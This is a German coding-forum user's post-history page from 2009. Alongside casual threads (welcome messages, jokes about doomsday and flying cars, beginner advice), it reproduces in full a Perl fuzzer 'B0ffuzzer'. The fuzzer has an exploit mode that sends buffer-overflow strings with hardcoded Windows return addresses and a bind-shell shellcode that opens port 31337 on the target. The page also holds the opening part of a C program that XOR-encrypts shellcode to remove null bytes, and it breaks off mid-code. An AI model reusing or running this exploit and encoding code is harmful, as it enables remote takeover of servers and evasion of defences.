PHP Forum - Coding Board
Juni 22, 2018, 08:30:19 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
News:
 
  Übersicht Hilfe Suche Einloggen Registrieren  
  Beiträge anzeigen
Seiten: [1] 2
1  Das Board / Vorschläge, Anregungen & Kritik / Masse oder Klasse? am: März 26, 2009, 02:01:16
Zitat von: //ins0.!;17220
Bei einem Invite System ist jeder User, der auf einen besondern niedrigen Niveau sich beweget, wie ein Virus...ist er erst einmal drin bekommt man ihn nur schwer wieder loss...

Aber durch in Invide System wird die hemschwelle erhöht Smiley

+ für


naja, solche fälle wirds immer geben, da muss eben der zuständige schnell genug reagieren und die person vom board fernhalten.
2  Das Board / Vorschläge, Anregungen & Kritik / Masse oder Klasse? am: März 25, 2009, 09:57:13
3  Das Board / News / Weltuntergang 2038 am: März 25, 2009, 09:24:49
Zitat von: Paran0id;17088
So ein quatsch, jeder weiss, das die Welt 2012 untergeht :-D

http://www.google.de/search?hl=de&q=2012+weltuntergang&btnG=Google-Suche&meta=


sehe ich auch so und vorher findet noch der 3.weltkrieg statt...
4  Programmierung / Code Schnipsel / [Perl] B0ffuzzer am: März 25, 2009, 06:54:30
fuzzer für die protokolle : HTTP/FTP/SMTP/POP/IMAP
ein vorteil ist hier bei diesem fuzzer, das jenes gefundene
sicherheitsleck automatisch in angriff genommen wird.
bei einem erfolgreichem exploiting-vorgang erscheint eine
bind-shell.

Code:

#B0ffuzzer v1.0  pang0 (c) 13 April 2007
#pang0@tcbilisim.org // www.TcBilisim.Org
#shootz: o.g. // Stansar  // Adriaan // x0
#tsk: GODAttach (cha0s) // Crx


use IO::Socket;
use Getopt::Std;


getopts("UvT:P:u:p:t:m:s:i:f:er:", \%mod);


$SIG{INT}=\&exitz;
$return_addres; #$return_addres = 0xdeadbeef;


print "
\t  B0ffuzzer v1.0 by pang0 (c) 2007
\t        www.tcbilisim.org
\t     HTTP/FTP/SMTP/POP/IMAP\n
";
if(!defined($mod{T}) or !defined($mod{m})){
print "
-U   : UDP Mode
-v   : Verbose Mode
-T   : Target*
-P   : Port Number(default: mode port)*
-u   : UserName(Optional)*
-p   : Pass(Optional)*
-t   : TimeOut(Optional)*
-m   : Fuzzer Mode*
-s   : String Type [format - overflow]*
-i   : interval of array (Optional)*
-f   : Functions*
-e   : Exploit Mode [for win bofoverexp]
-r   : Return Addr.(Optional)(for -e func)*
Return Targets: xp1 - xp2 - sp12003 - winnt
Fuzzer Modez: http/ftp/smtp/pop/imap
Do You Want More Exam Read POD
exam : perl $0 -v -P 21 -m FTP -t 7 -T 127.0.0.1 -s overflow -r BBBB
exam : perl $0 -v -m HTTP -T 127.0.0.1 -i 2570-2900 -s format
exam : perl $0 -v -e -m FTP -T 127.0.0.1 -f \"USER~,PASS wtf\" -P 21 -i 313 -r xp2
* : Need Argv
";


exit


}
%eips = (    #thx to metasploit 4 0pcodez (All English)
xp1 => "\x20\x29\xd5\x77",#0x77d52920   call esp
xp2 => "\x97\xE6\x91\x7C",#0x7c91e697   call esp
winnt => "\xED\x29\xF1\x77",#0x77f129ed  call esp
sp12003 => "\x6C\x86\xC0\x71" #0x71c0866c call esp
);


%port = (
ftp => 21,
http => 80,
smtp => 25,
pop => 110,
imap => 143
);


%check = (
ftp_user  => "USER %s\r\n",
ftp_pass => "PASS %s\r\n",
pop_user => "USER %s\r\n",
pop_pass => "PASS %s\r\n",
imap_user => "a001 LOGIN %s ",
imap_pass => "%s\r\n"
);


%login = (
ok_ftp => 230,
no_ftp => 530,
ok_imap => "A001 OK",
no_imap => "A001 NO",
ok_pop => "+OK logged",
no_pop => "-ERR"
);


#WindowsBindShell 31337 thx metasploit & Don't Change Shellcode!
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x61".
"\x58\x50\x30\x41\x30\x42\x6b\x42\x41\x71\x41\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4a\x49\x6b\x4c\x70".
"\x6a\x7a\x4b\x32\x6d\x48\x68\x7a\x59\x6b\x4f\x4b\x4f\x79\x6f\x53".
"\x50\x6e\x6b\x42\x4c\x75\x74\x74\x64\x6e\x6b\x73\x75\x47\x4c\x6c".
"\x4b\x53\x4c\x45\x55\x33\x48\x67\x71\x5a\x4f\x4e\x6b\x32\x6f\x65".
"\x48\x6c\x4b\x51\x4f\x77\x50\x35\x51\x6a\x4b\x63\x79\x4c\x4b\x57".
"\x44\x6e\x6b\x37\x71\x7a\x4e\x34\x71\x49\x50\x6a\x39\x4e\x4c\x6e".
"\x64\x4f\x30\x52\x54\x57\x77\x4b\x71\x69\x5a\x74\x4d\x35\x51\x58".
"\x42\x78\x6b\x68\x74\x75\x6b\x32\x74\x41\x34\x76\x48\x30\x75\x49".
"\x75\x6e\x6b\x71\x4f\x51\x34\x74\x41\x58\x6b\x52\x46\x4e\x6b\x56".
"\x6c\x42\x6b\x6e\x6b\x53\x6f\x55\x4c\x64\x41\x7a\x4b\x65\x53\x76".
"\x4c\x6c\x4b\x4f\x79\x70\x6c\x71\x34\x65\x4c\x75\x31\x6b\x73\x46".
"\x51\x4b\x6b\x41\x74\x4e\x6b\x51\x53\x50\x30\x4e\x6b\x77\x30\x56".
"\x6c\x6e\x6b\x70\x70\x77\x6c\x6c\x6d\x4e\x6b\x71\x50\x33\x38\x73".
"\x6e\x41\x78\x4c\x4e\x70\x4e\x46\x6e\x7a\x4c\x62\x70\x6b\x4f\x4b".
"\x66\x43\x56\x50\x53\x50\x66\x33\x58\x30\x33\x44\x72\x33\x58\x63".
"\x47\x30\x73\x57\x42\x41\x4f\x66\x34\x4b\x4f\x6e\x30\x75\x38\x78".
"\x4b\x38\x6d\x79\x6c\x37\x4b\x66\x30\x39\x6f\x6e\x36\x41\x4f\x4c".
"\x49\x4d\x35\x33\x56\x4c\x41\x38\x6d\x54\x48\x36\x62\x56\x35\x73".
"\x5a\x56\x62\x49\x6f\x68\x50\x35\x38\x78\x59\x56\x69\x79\x65\x4e".
"\x4d\x70\x57\x39\x6f\x6b\x66\x41\x43\x70\x53\x70\x53\x72\x73\x76".
"\x33\x62\x63\x43\x63\x52\x63\x72\x73\x6b\x4f\x48\x50\x33\x56\x51".
"\x78\x41\x6a\x33\x59\x52\x46\x71\x43\x4d\x59\x4d\x31\x6d\x45\x73".
"\x58\x4f\x54\x77\x6a\x72\x50\x4b\x77\x30\x57\x49\x6f\x48\x56\x51".
"\x7a\x34\x50\x50\x51\x43\x65\x79\x6f\x68\x50\x30\x68\x4e\x44\x6c".
"\x6d\x64\x6e\x38\x69\x33\x67\x6b\x4f\x4e\x36\x32\x73\x53\x65\x49".
"\x6f\x58\x50\x75\x38\x49\x75\x32\x69\x4b\x36\x42\x69\x53\x67\x4b".
"\x4f\x79\x46\x42\x70\x41\x44\x62\x74\x70\x55\x39\x6f\x7a\x70\x4d".
"\x43\x41\x78\x6d\x37\x30\x79\x48\x46\x62\x59\x33\x67\x6b\x4f\x79".
"\x46\x46\x35\x79\x6f\x4e\x30\x75\x36\x43\x5a\x31\x74\x62\x46\x33".
"\x58\x33\x53\x62\x4d\x4c\x49\x7a\x45\x63\x5a\x56\x30\x51\x49\x67".
"\x59\x48\x4c\x6b\x39\x4b\x57\x53\x5a\x67\x34\x6c\x49\x4b\x52\x47".
"\x41\x6b\x70\x4c\x33\x4e\x4a\x6b\x4e\x67\x32\x64\x6d\x6b\x4e\x51".
"\x52\x44\x6c\x4d\x43\x6c\x4d\x72\x5a\x45\x68\x6c\x6b\x4c\x6b\x4c".
"\x6b\x50\x68\x50\x72\x6b\x4e\x68\x33\x52\x36\x4b\x4f\x32\x55\x72".
"\x64\x49\x6f\x4e\x36\x53\x6b\x30\x57\x73\x62\x71\x41\x32\x71\x52".
"\x71\x32\x4a\x45\x51\x31\x41\x32\x71\x56\x35\x70\x51\x39\x6f\x38".
"\x50\x63\x58\x6c\x6d\x39\x49\x47\x75\x7a\x6e\x71\x43\x4b\x4f\x68".
"\x56\x41\x7a\x59\x6f\x6b\x4f\x75\x67\x79\x6f\x78\x50\x4e\x6b\x50".
"\x57\x59\x6c\x6f\x73\x78\x44\x31\x74\x49\x6f\x6a\x76\x36\x32\x4b".
"\x4f\x7a\x70\x30\x68\x58\x70\x6c\x4a\x34\x44\x43\x6f\x31\x43\x69".
"\x6f\x58\x56\x79\x6f\x4e\x30\x61";


@cmd_ftp = (
"ACCT LOL", "APPE LOL", "ALLO LOL", "CWD LOL",
"CEL LOL","DELE LOL","HELP LOL","MDTM LOL",
"MLST LOL","MODE LOL","MKD LOL","MKD LOL\r\nCWD LOL",
"MKD LOL\r\nDELE LOL","MKD LOL\r\nRMD LOL",
"MKD LOL\r\nXRMD LOL","NLST LOL","RETR LOL",
"REST LOL","RNFR LOL","RMD LOL","RNTO LOL",
"RNFR LOL\r\nRNTO LOL","SIZE LOL",
"STRU LOL","STOR LOL","STAT LOL",
"SMNT LOL","SITE LOL","SITE EXEC LOL",
"SITE GROUPS LOL","SITE CDPATH LOL","SITE ALIAS LOL",
"SITE INDEX LOL","SITE MINFO 20001010101010 LOL",
"SITE NEWER 20001010101010 LOL","SITE GPASS LOL",
"SITE GROUP LOL","SITE HELP LOL","SITE IDLE LOL",
"SITE CHMOD LOL","SITE CHMOD LOL LOL","SITE UMASK LOL","TYPE LOL","XRMD LOL","LOL"
);


@cmd_http = (
"GET LOL HTTP/1.1\r\n","GET LOL LOL\r\n","GET / LOL",
"POST LOL HTTP/1.1\r\n","POST / LOL\r\n","POST LOL LOL\r\n",
"HEAD LOL LOL\r\n","HEAD LOL HTTP/1.1\r\n","HEAD / LOL\r\n",
"GET / HTTP/1.1\r\nUser-Agent: LOL\r\n","GET / HTTP/1.1\r\nHost: LOL\r\n",
"GET / HTTP/1.1\r\nAccept: LOL\r\n","GET / HTTP/1.1\r\nAccept-Encoding: LOL\r\n",
"GET / HTTP/1.1\r\nAccept-Language: LOL\r\n","GET / HTTP/1.1\r\nAccept-Charset: LOL\r\n",
"GET / HTTP/1.1\r\nConnection: LOL\r\n","GET / HTTP/1.1\r\nReferer: LOL\r\n",
"GET / HTTP/1.1\r\nAuthorization: LOL\r\n","GET / HTTP/1.1\r\nFrom: LOL\r\n",
"GET / HTTP/1.1\r\nCharge-To: LOL\r\n","GET / HTTP/1.1\r\nAuthorization: LOL\r\n",
"GET / HTTP/1.1\r\nAuthorization: LOL : wtf\r\n","GET / HTTP/1.1\r\nAuthorization: wtf : LOL\r\n",
"GET / HTTP/1.1\r\nAuthorization: LOL : LOL\r\n",
"GET / HTTP/1.1\r\nIf-Modified-Since: LOL\r\n","GET / HTTP/1.1\r\nChargeTo: LOL\r\n",
"GET / HTTP/1.1\r\nPragma: LOL\r\n","GET / HTTP/1.1\r\nLOL\r\n"
);


@cmd_pop = (
"LIST LOL","STAT LOL",
"STAT LOL","NOOP LOL",
"APOP LOL","APOP LOL wtf",
"APOP wtf LOL","APOP LOL LOL",
"RSET LOL","RETR LOL","DELE LOL",
"TOP LOL 1","TOP 1 LOL","UIDL LOL",
"LOL"
);



@cmd_imap = (
"A001 CREATE LOL","FXXZ CHECK LOL",
"LIST LOL","A001 SELECT LOL",
"A001 EXAMINE LOL","A001 CREATE LOL",
"A001 DELETE LOL","A001 RENAME LOL",
"A001 CREATE test\r\nA001RENAME test LOL",
"A001 SUBSCRIBE LOL","A001 UNSUBSCRIBE LOL",
"A001 LIST LOL aa","A001 LIST aa LOL",
"A001 LIST * LOL","A001 LSUB aa LOL",
"A001 LSUB LOL aa \r\n","A001 STATUS LOL",
"A001 STATUS inbox (LOL)\r\n","A001 APPEND LOL",
"A001 SELECT LOL\r\nA001 SEARCH LOL",
"A001 SELECT LOL\r\nA001 FETCH LOL",
"A001 SELECT LOL\r\nA001 FETCH 1:2 LOL",
"A001 SELECT LOL\r\nA001 STORE LOL",
"A001 SELECT LOL\r\nA001 STORE 1:2 LOL",
"A001 SELECT LOL\r\nA001 COPY LOL",
"A001 SELECT LOL\r\nA001 COPY 1:2 LOL",
"A001 SELECT LOL\r\nA001 UID LOL",
"A001 SELECT LOL\r\nA001 UID FETCH LOL",
"A001 UID LOL","A001 CAPABILITY LOL",
"A001 DELETEACL LOL","A001 GETACL LOL",
"A001 LISTRIGHTS LOL","A001 MYRIGHTS LOL",
"A001 LOL","LOL"
);


@cmd_no_pop=@cmd_no_ftp=(
"USER LOL,PASS wtf","USER anonymous,PASS LOL",
"USER LOL,PASS LOL"
);


@cmd_no_imap = (
"A001 LOGIN LOL wtf","A001 LOGIN wtf LOL",
"A001 LOGIN LOL LOL"
);


$mod{m}=~tr/[A-Z]/[a-z]/;
if (!($mod{m}=~/^ftp$|^http$|^imap$|^pop$|^smtp$/i)){
print "Invalid Mode\n";
exit
}


if($mod{u}&&!$mod{p} or !$mod{u}&&$mod{p}){
print "\nMissing Argv. (user and pass error)";
exit
}


#port - proto - timeout
if(defined($mod{P}) && $mod{P}=~/(\d+)/){
$port = $1;
}
else{
$port = $port{$mod{m}};
}
vr("Using Port: $port");
$proto = "tcp";
if(defined($mod{U})){
$proto = "udp"
}
vr("Using Protocol: $proto");
$to = 30;
if(defined($mod{t}) && $mod{t}=~/(\d+)/){
$to = $1
}
vr("Using TimeOut: $to");
if(defined($mod{u} && $mod{p})){
$check_pass = check($mod{T},$mod{m},$mod{u},$mod{p});
if($check_pass==31){
$logged = 0
}
elsif($check_pass==31337){
$logged = 31337
}
}

#########################################

#port - proto -timeout
if(defined($mod{e})){
exploit($mod{T})
}
if(defined($mod{s}) && $mod{s}=~/^overflow$|^format$/){
if ($mod{s}=~/overflow/){
$string = "\x41";
vr("String Type: Overflow");
}
if ($mod{s}=~/format/){
$string = "%s";
vr("String Type: Format")
}
}
elsif(defined($mod{s})){vr($mod{s} . &quot; <- isn't defined String Type\nSo Using Default: Overflow\n&quot;);
$string = &quot;A&quot;
}
else{vr(&quot;Using Default: Overflow&quot;);$string = &quot;A&quot;}
if(defined($mod{i}) && $mod{i}=~/(\d+)\-(\d+)/){
if($1 > $2){print &quot;$1 Big Than $2 wtf!\n&quot;;exit}
for($lol=$1;$lol <= $2;++$lol){
if(defined($mod{r}) && $string eq 'A'){
$array[$aa] = &quot;$string&quot; x ($lol - (length($mod{r})));
$array[$aa] .= $mod{r}
}
else{
$array[$aa] = &quot;$string&quot; x $lol
}
++$aa
}
vr(&quot;Char Interval : $1 - $2&quot;);
}
if(defined($mod{i}) && $mod{i}=~/(\d+)/){
if(defined($mod{r}) &&  $string eq 'A'){
@array = &quot;$string&quot; x ($1 - length($mod{r})) . $mod{r};
}
else{
@array = $string x $1
}
}
else{
@array = (&quot;$string&quot; x 16, &quot;$string&quot; x 32, &quot;$string&quot; x 64, &quot;$string&quot; x 128, &quot;$string&quot; x 256,
&quot;$string&quot; x 512, &quot;$string&quot; x 1024, &quot;$string&quot; x 2048, &quot;$string&quot; x 4096, &quot;$string&quot; x 8192);
vr(&quot;Using Default Char Interval&quot;);
}
sub vr{
if(defined($mod{v})){
for(@_){
print($_,&quot;\n&quot;);
}
}
};
sub soket{
close($sok);
$sok = IO::Socket::INET->new(PeerAddr => $_[0], PeerPort => $port, Proto => $proto, TimeOut => $to)
or exitz();
}
sub exitz{
if(!$sok){
print &quot;\nHost Doesn't Exitz\n&quot;
}
else{print &quot;\nHost Exited\n&quot;}
if($boflen){
sleep 1;
$lollz = '[BOF=>$boflen]';
$fnc =~s/LOL/$lollz/eg;
print &quot;Last Sended Finger=> $fnc\r\n&quot;
}
exit
}
sub check{
vr(&quot;Connecting Server&quot;);
$host = shift;
$mode = shift;
soket($host);
$login_ok = $login{&quot;ok_&quot; . $mode};
$login_no = $login{&quot;no_&quot; . $mode};
$check_user = $check{$mode . '_user'};
$check_pass = $check{$mode . '_pass'};
if($mode=~/^ftp$|^imap$|^pop$/i){
vr(&quot;Checking Username & Password&quot;);
printf $sok &quot;$check_user&quot;,$_[0] or &exitz;
sleep 1;
printf $sok &quot;$check_pass&quot;,$_[1] or &exitz
}
else{
print &quot;Don't Required Username And Pass For &quot;,$mode;
return 31;
}
while(<$sok>){
if(/^\+$login_ok/i or /^$login_ok/i){
return 31337#;x
}
if(/^$login_no/i){
print &quot;[-] Login Failed\r\n&quot;;
exit
}
}
}
sub exploit{
sleep 1;
$host = shift;
$boflen = 0;
#ret
if($return_addres){
$ret = pack('L', $return_addres);
}
elsif(defined($mod{r})){
$mod{r}=~tr/[A-Z]/[a-z]/;
if($mod{r}=~/^xp1$|^xp2$|^winnt$|^sp12003$/){
$ret = $eips{$mod{r}};
}
else{print $mod{r},&quot;Undefined Return Type&quot;;exit}
}
else{
$ret = pack(l, 0x7C94EFF3); #0x7C94EFF3  call esp  from turkish winxpprosp2 ntdll.dll
vr(&quot;Using Default Ret: 0x7C94EFF3&quot;);
}
#ret
#bof  +
if(defined($mod{i}) && $mod{i}=~/(\d+)/){
$nop = &quot;\x41&quot; x $1
}
else{
print &quot;Undefined [Interval of Buffer]&quot;;
exit
}
if(defined($mod{f})){
vr(&quot;Connecting to $host:$port&quot;);
soket($host);
sleep 1;
if($logged){
printf $sok $check{$mod{m} . '_user'},$mod{u} or &exitz;
sleep 1;
printf $sok $check{$mod{m} . '_pass'},$mod{p} or &exitz
}
vr(&quot;Connected Sending Evil Func & Shellcode&quot;);
for(@funcs = split ',',$mod{f}){
if(/(.*?)\~$/){
$lol = &quot;$1 $nop$ret&quot; . &quot;\x90&quot; x 31 . &quot;$shellcode&quot; . &quot;\x90&quot;x15;
print $sok &quot;$lol\r\n&quot; or &exitz;
sleep 1;
}
else{
print $sok &quot;$_ \r\n&quot; or &exitz;
sleep 1
}
}
}
else{
print &quot;Function isn't Selected&quot;;
exit
}
print &quot;Shellcode Sended Check out 31337 port of $host\n&quot;;
exit
}
#fuzzer mode
if($mod{m}=~/ftp|imap|pop/ && defined($mod{u} && $mod{p}) or $mod{m} eq 'http'){
$cmd = &quot;cmd_&quot; . $mod{m};
}
elsif($mod{m} eq 'smtp'){
print &quot;\r\nThis Mode Must Be Contain an e-mail Addres\r\nAddres =>&quot;;
chop($mail = <STDIN>);
$cmd = &quot;cmd_smtp&quot;;
if(!$mail){print &quot;Dont Trick With Me&quot;; exit}
}
else{
$cmd = &quot;cmd_no_&quot; . $mod{m};
$amk_perl = 31337;
}
@cmd_smtp = ( #perl is very poor!
&quot;EXPN LOL&quot;,&quot;EHLO LOL&quot;,&quot;MAIL FROM: LOL&quot;,
&quot;MAIL FROM: <LOL> LOL&quot;,&quot;MAIL FROM: <LOL> RET=LOL&quot;,
&quot;MAIL FROM: <LOL> ENVID=LOL&quot;,&quot;ETRN LOL&quot;,
&quot;ETRN \@LOL&quot;,&quot;MAIL FROM: <LOL>\r\nRCPT TO: <LOL>&quot;,
&quot;MAIL FROM: <LOL>\r\nRCPT TO: <LOL> LOL&quot;,
&quot;MAIL FROM: <LOL>\r\nRCPT TO: <LOL> NOTIFY=LOL&quot;,
&quot;MAIL FROM: <LOL>\r\nRCPT TO: <LOL> ORCPT=LOL&quot;,
&quot;HELP LOL&quot;,&quot;VRFY LOL&quot;,&quot;RSET LOL&quot;,&quot;AUTH mechanism LOL&quot;,
&quot;LOL&quot;,&quot;MAIL FROM: <$mail>\r\nRCPT TO: <$mail> LOL&quot;,
&quot;MAIL FROM: <$mail>\r\nRCPT TO: <$mail> NOTIFY=LOL&quot;,
&quot;MAIL FROM: <$mail>\r\nRCPT TO: <$mail> ORCPT=LOL&quot;,
&quot;MAIL FROM: <$mail> LOL&quot;,&quot;MAIL FROM: <$mail> RET=LOL&quot;,
&quot;MAIL FROM: <$mail> ENVID=LOL&quot;,&quot;ETRN LOL&quot;,
&quot;MAIL FROM: <LOL\@LOL>\r\nRCPT TO: <LOL\@LOL> LOL&quot;,
&quot;MAIL FROM: <LOL\@LOL>\r\nRCPT TO: <LOL\@LOL> NOTIFY=LOL&quot;,
&quot;MAIL FROM: <LOL\@LOL>\r\nRCPT TO: <LOL\@LOL> ORCPT=LOL&quot;,
&quot;MAIL FROM: <LOL\@LOL> LOL&quot;,&quot;MAIL FROM: <LOL\@LOL> RET=LOL&quot;,
&quot;MAIL FROM: <LOL\@LOL> ENVID=LOL&quot;,&quot;ETRN LOL&quot;,
&quot;MAIL FROM: <LOL\@LOL>\r\nRCPT TO: <LOL\@LOL>&quot;
);
for $func (@$cmd){
$fnc = $func;
$amkarr = &quot;&quot;;
$amk = 0;
for $arr (@array){
soket($mod{T});
if($logged){
printf $sok $check{$mod{m} . '_user'},$mod{u},&quot;\r\n&quot; or &exitz;
sleep 1;
printf $sok $check{$mod{m} . '_pass'},$mod{p},&quot;\r\n&quot; or &exitz;
sleep 1;
}
$t = &quot;\t&quot;;
if($amk_perl){
$fnc=~s/\,/$t/eg
}
if(!$amk){
$boff = &quot;[BOF=>&quot; . length($arr) . &quot;]&quot;;
$func=~s/LOL/$arr/eg;
$fnc=~s/LOL/$boff/eg;
print &quot;$fnc&quot;
}
else{
$func=~s/$amk/$arr/eg;
print &quot;->&quot; . length($arr) . &quot;\r\n&quot; ;
}
$amk = $arr;
if($amk_perl){
@muciorecebicci = split ',',$func;
for (@muciorecebicci){
print $sok &quot;$_\r\n&quot;;
sleep 1;
}
}
else{
print $sok &quot;$func\r\n&quot; or &exitz;
}
$boflen = length($arr) . &quot;\n&quot;;
}
print &quot;\r\n&quot;
}
__END__

=head1 Description

Basic Buffer Overfl0w & Format String Tester
Coded For Security!

=head1 Functions

 -U  => Use UDP Protocol (boolean flag)
 -v  => Use Verbose Mode (boolean flag)
 -T  => Define To Target (Need Arg)
 -P  => Define To TargetPort (If u r not defined this func[Using Default ModezPort])
 -u  => Define UserName To Login Server[Optional]
 -p  => Define Pass To Login Server[Optional]
 -t  => Define TimeOut For Socket [If Not Defined => 30]
 -m  => Fuzzer Mode [FTP/HTTP/IMAP/POP/SMTP]
 -s  => Define String Type [If Not Defined => overflow]
 -i  => Define Interval Array of Buffer [If Not Defined => Default]
 -f  => Define Functions For Exploit Mode [Need Arg]
 -e  => Exploit Mode(Boolean flag) [for win bofoverexp]
 -r  => Return Addr.(Optional)

=head1 Exams

=over 4

=item Exploit  (-e Function)

 If U want Define to Bof Function Plz Add to end array => &quot;~&quot;
 If U want separate to function Plz Add to end array => &quot;,&quot;

 perl b0ffuzzer.pl -v -m ftp -T 127.0.0.1 -e -i 831 -f &quot;MKD wtf,CD wtf,DEL~&quot; -u woot -p toow -r xp1
 perl b0ffuzzer.pl -v -m ftp -T 127.0.0.1 -e -i 3331 -f &quot;USER~,PASS wtf&quot; -r xp2

=item Fuzzer Function

 perl b0ffuzzer.pl -m http -T 127.0.0.1 -r BBBB -i 830-840
 perl b0ffuzzer.pl -m imap -T 127.0.0.1 -u wtf -p wtf -v -P 31
 perl b0ffuzzer.pl -v -m ftp -T 127.0.0.1 -P 8021 -s format
 perl b0ffuzzer.pl -U -t 7 -m pop -T 127.0.0.1 -v -s overflow -u woot -p woot
 perl b0ffuzzer.pl -U -m smtp -T 127.0.0.1 -P 26

=head1 Variable

=item Return Address

 xp1     =>  0x77d52920   call esp
 xp2     =>  0x7c91e697   call esp
 winnt   =>  0x77f129ed   call esp
 sp12003 =>  0x71c0866c   call esp

=item Fuzzer Modes

FTP / HTTP / IMAP / POP / SMTP

=head1 Author

       pang0  (c) 2007
 Web Site : www.TcBilisim.Org
 E-Mail   : pang0@tcbilisim.org


=cut
5  Das Board / News / Fliegendes Auto! Will haben :D am: März 25, 2009, 12:06:34
Zitat von: alexj.;16909
3. Fligendes verkehr wo sind die Ampel alles was passiert wenn sich 2 fliegende Autos aneinander rammen denkt ihr das wird es so schnell geben des könnt ihr vllt in 80 Jahren erwarten...Zitat
ausserdem is im himmel genug platz da brauch ma keine ampeln  nur jmd der koordiniert wer wo fliegt ;-)

spätestens, wenn die ganze welt auf diese alternative umgestiegen ist, wird es ein kleines platzproblem geben Smiley

und allein die umstellung selbst würde viel kosten und die umwelt zusätzlich schädigen, ist halt dann fraglich ob wir es die menschheit je miterleben darf, das eines tages jeder mit einem fliegenden auto unterwegs ist.
6  Das Board / Hello World / <? echo "Hallo zusammen"; ?> am: März 24, 2009, 07:55:09
auch von mir ein herzliches willkommen, ist ja echt wahnsinn wie schnell und vor allem wie viele leute gleich neu dazukommen.
7  Programmierung / Delphi, Pascal / Postet mehr Sources am: März 24, 2009, 07:53:06
Zitat von: theplayer;16871
nya, hört sich für mich ein bisschen danach an: postet mal mehr sources, damit wir "copy-paste-kids" auch was haben...

8  Programmierung / C & C++ / [s] anf?ngeraufgaben am: März 24, 2009, 07:44:13
programmiere dir am besten immer sachen die du wirklich gebrauchen kannst, bspw. tools die dir den alltag am pc erleichtern können ( ich verwende bspw. einen perl script der meine mails aus der mailbox automatisch downloaded bei bedarf ), so verwaltungsprogramme sind da auch nicht so übel ( was ja bereits genannt wurde ). und selbst wenn es derartiges schon geben sollte, es kann nie schaden das rad "für sich" nochmal zu entwickeln.
9  Programmierung / Code Schnipsel / [B] Konsole - Schriftfarben am: März 23, 2009, 11:47:59
für die, die es unter linux beim shell-programming mit den ansi escape sequenzen kennen, die kann man ebenfalls in c miteinbauen ( müsste unter windows auch laufen, ich habe bisjetzt diese sequenzen in c-anwendungen unter linux verwendet ):

http://public.tfh-berlin.de/~kempfer/skript_c/Kap07.html

@onkel2k, thx für deinen post, dein code ist sehr praktisch und nützlich für mich.
10  Das Board / Hello World / TonyMontana ist da! am: März 23, 2009, 11:38:55
hey scarface, willkommen an board!
11  Programmierung / CGI, Perl u. Python Hilfe / [Perl] Einzeiler am: März 22, 2009, 10:47:17
url]http://www.osnets.de/wordpress/2006/06/27/perl-einzeiler/[/url]
[url]http://linuxwiki.de/PerlEinzeiler[/url]
[url]http://bei-priess.de/computer/perl/snippets.php[/url]
http://www.heise.de/ix/artikel/1998/07/133/
http://www.einzeiler.de/  <-- mal schauen was daraus wirhttp://www.osnets.de/wordpress/2006/06/27/perl-einzeiler/
http://linuxwiki.de/PerlEinzeiler
http://bei-priess.de/computer/perl/snippets.php
http://www.heise.de/ix/artikel/1998/07/133/
http://www.einzeiler.de/  <-- mal schauen was daraus wird
12  Das Board / Hello World / Anatoxis ist hier am: März 20, 2009, 07:09:07
herzlich willkommen bei scene coderz!
13  Programmierung / Code Schnipsel / [C] Shellcode Crypter am: März 20, 2009, 05:28:32
verschlüsselt shellcode mit xor :

Code:


/*
 *  Shellcode Crypter v0.2 (Linux _ Windows)
 *    Coded by Shen139  31-07-2005
 *    shen139 (at_) eviltime [.dot.] com
 *
 * ...
 * //PUT HERE YOUR SHELLCODE
 * char shellcode[]=&quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x6a\x0a\x68\x2e\x63\x6f\x6d\x68\x74\x69\x6d&quot;
 * &quot;\x65\x68\x65\x76\x69\x6c\x68\x31\x33\x39\x40\x68\x73\x68\x65\x6e\x89\xe1\xb2\x15\xb0\x04\xcd\x80\x31&quot;
 * &quot;\xc0\x31\xdb\xb0\x01\xcd\x80\xc3\x90\x90&quot;;
 * ...
 *
 * Put tHERE your shellcode, then compile (&quot;gcc sc.c -o sc&quot;) and run (&quot;./sc&quot;) the program and copy the output!
 *
 * -[...You won't worry anymore for 0x00 in your shellcode...]-
 *
 * Enjoy :D
 *
 */

//PUT HERE YOUR SHELLCODE
char shellcode[]=&quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x6a\x0a\x68\x2e\x63\x6f\x6d\x68\x74\x69\x6d&quot;
&quot;\x65\x68\x65\x76\x69\x6c\x68\x31\x33\x39\x40\x68\x73\x68\x65\x6e\x89\xe1\xb2\x15\xb0\x04\xcd\x80\x31&quot;
&quot;\xc0\x31\xdb\xb0\x01\xcd\x80\xc3\x90\x90&quot;;


//Set SHELLCODE_LENGHT with 0 if your shellcode does not contain \x00
// otherwise set it with the length of the shellcode
#define SHELLCODE_LENGHT  0

//UnComment this line and set the value used to xor the shellcode if you want to use an hard-coded one
// otherwise it will be calculated dynamically in manner that while xoring it doesn't generate 0x00
//#define HARDCODEDXOR      139


//Crypted_shellcode_length - Original_shellcode_length = 25 bytes
//MAGIC_SUFFIX_PARTa + MAGIC_SUFFIX_PARTb + MAGIC_SUFFIX_PARTc + xor_value + shellcode_length_value = 25 bytes
#define CIPHERLENGTH        25

#include <stdio.h>
#include <string.h>
#include <stdlib.h>


#define MAGIC_SUFFIX_PARTa    &quot;\\x33\\xC9\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x58\\x83\\xC0\\x0E\\x80\\x30&quot;
/* AT&T
0x08049560 <shellcode+0>:        xor    %ecx,%ecx
0x08049562 <shellcode+2>:        jmp    0x8049566 <shellcode+6>
0x08049564 <shellcode+4>:        jmp    0x804956b <shellcode+11>
0x08049566 <shellcode+6>:        call   0x8049564 <shellcode+4>
0x0804956b <shellcode+11>:       pop    %eax
0x0804956c <shellcode+12>:       add    $0xe,%eax
0x0804956f <shellcode+15>:       xorb   Xor ,(%eax)
*/
// + XOR
#define MAGIC_SUFFIX_PARTb    &quot;\\x40\\x41\\x83\\xF9&quot;
/*
0x08049572 <shellcode+18>:       inc    %eax
0x08049573 <shellcode+19>:       inc    %ecx
0x08049574 <shellcode+20>:       cmp    shellcode_length ,%ecx
*/
// + Shellcode_length
#define MAGIC_SUFFIX_PARTc    &quot;\\x75\\xF6&quot;
/*
0x08049577 <shellcode+23>:       jne    0x804956f <shellcode+15>
*/

/* intel *
00401026 33 C9                xor         ecx, ecx
